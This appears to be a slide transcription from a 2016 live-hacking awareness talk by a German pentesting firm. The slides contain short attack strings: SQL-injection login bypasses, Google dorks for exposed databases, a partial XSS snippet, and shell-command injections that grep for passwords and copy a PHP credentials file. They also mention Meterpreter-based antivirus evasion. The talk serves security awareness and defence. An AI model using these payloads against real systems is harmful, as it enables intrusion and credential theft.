LIVE HACKING. 09:30-10:00 Uhr 14/06/16

Transcription

1 LIVE HACKING 09:30-10:00 Uhr Page 1

2 AGENDA 1. DOS attack against an internet web server 2. Deactivating burglar alarm 3. Attacking wireless keyboards 4. SMS spoofing and identity theft 5. Attacks against crypto usb sticks 6. Smartphone trojan / SIM bug 7. Hardware hacker tools If time 1. USB attacks 2. Evading antivirus 3. SQL Injection Page 2

3 ABOUT THE SPEAKER Dipl.-Inform. Sebastian Schreiber Managing Director of +49 (0) Page 3

4 ABOUT SYSS GMBH Founded in 1998 At present: about 80 employees Based in Tübingen, southwest Germany Operating worldwide, focusing on Germany Rapidly growing: new campus providing space for 280 Pentest Experts is under construction Services Penetration Testing & Security Analyses (95%) Incident Response/ Training/ Live Hacking Presentations (5%) Page 4

5 SELECTED INCIDENCES /2015: Russian Hackers Read Obama s Unclassified s nytimes.com 05/2015: IT Incident Deutscher Bundestag tagesschau.de 07/2015: Hacker remotely take over a Jeep Cherokee heise.de 07/2015: Hackers can disable a sniper rifle or change its target wired.de 07/2015: Surveillance software: Hacking Team becoming Hacked Team heise.de 08/2015: Ashley Madison Dating Portal: Hacker stealing 11,2 Mio. passwords golem.de 09/2015: Cyber crime: Robbing fingerprints of more then five million US government employees wired.de 10/2015: USA: Hacker stealing data about millions of T-Mobile customers Spiegel.de 10/2015: Online banking: New ways of attacking German mtan heise.de Page 5

6 GOOGLE HACKING Filetype:sql phpmyadmin wp_users inurl:warenkorb inurl:preis Page 6

7 LIVE-HACK HOTEL peter/peter Admin / passwort Page 7

8 SQL INJECTION IN LOG-IN FORMS SELECT * FROM users WHERE user='peter' AND password='peter peter' OR 1=1# SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter Page 8

9 DENIAL OF SERVICE (DOS) Angriff: /home/livehack/thc/run.sh Page 9

10 iphone/ipad HACKS Page 10

11 ANTIVIRUS EVASION (1/2) How antivirus software works Blacklisting Whitelisting Blacklisting: How it works and its weak points Signature based: Searching for known patterns Unknown Page 11

12 ANTIVIRUS EVASION (2/2) Blacklisting: How it works and its weak points Signature-based: Searching for known patterns Unknown malware will not be detected Polymorphic malware has already been used for a long time to outsmart signaturebased detection Behavior-based: Software is classified as harmless or harmful according to its behavior In general, rule-based technologies in combination with scoring procedures and fixed thresholds concerning calculated scores (heuristic procedures) Static code analysis: It is only possible to check code directly accessible within an executable file Dynamic code analysis during runtime (sandbox environment): Various limitations given by the sandbox environment (e.g., period of time, specific user actions like mouse clicks etc.) Page 12

13 ANTIVIRUS EVASION: LIVE DEMONSTRATION Example for antivirus software: Microsoft Security Essentials Free-of-charge malware protection for end-users and small business Uses the same technology and scan engine as System Center 2012 Endpoint Protection (formerly Forefront Endpoint Protection) Creating an executable file containing known malware using the software ShCoLo by Using the following antivirus evasion methods: Polymorphism Encryption + compression Detection of sandbox environments Malware: Meterpreter Shell (windows/meterpreter/reverse_https) of Metasploit Framework Page 13

14 ANTIVIRUS EVASION: TEST RESULTS Product Version Date of virus definition file Operating system(s) of target systems Avira AntiVir Professional Windows XP SP 3 (32 Bit) Windows 7 SP 1 (64 Bit) AVG Free Windows XP SP 3 (32 Bit) Kaspersky Endpoint Protection Workstation Windows XP SP 3 (32 Bit) McAfee SaaS Endpoint Protection Windows 7 SP 1 (64 Bit) Microsoft Security Essentials Windows XP SP 3 (32 Bit) Sophos Endpoint Security and Control Windows XP SP 3 (32 Bit) Symantec Endpoint Protection Windows 7 SP 1 (64 Bit) Page 14

15 MOBILE PHONE TROJAN Symbian phone: SMS forwarding Activate the microphone Reboot Location info Page 15

16 FIPS CERTIFIED CRYPTO USB STICKS (1/2) Page 16

17 FIPS CERTIFIED CRYPTO USB STICKS (2/2) Page 17

18 ACTIONABLE TAKEAWAYS Be aware of digital attacks 24/7 Try to think like a hacker when applying IT safety measures Perform security assessments like penetration tests Stay alert and retest your IT security on regular basis Remember: The next vulnerability could just be found while attending this session Page 18

19 XSS <script>window.open(' ipt> Page 19

20 INJECTIONS, PHP MAGIC QUOTES Search for, e.g., SySS Search for!" $%&/()=?` Conclusio: PHP Magic Quotes Search for SySS $(sleep 4) $(grep -r -i password * > /tmp/passwd) Search for $(cat inc/userdata.inc.php base64 > /tmp/userdata.txt) Page 20

21 QUIZDUELL Opponent: lhtest2 Page 21

22 Thank you very much for your attention! SySS The Pentest Experts Sebastian Schreiber, Managing Director Page 22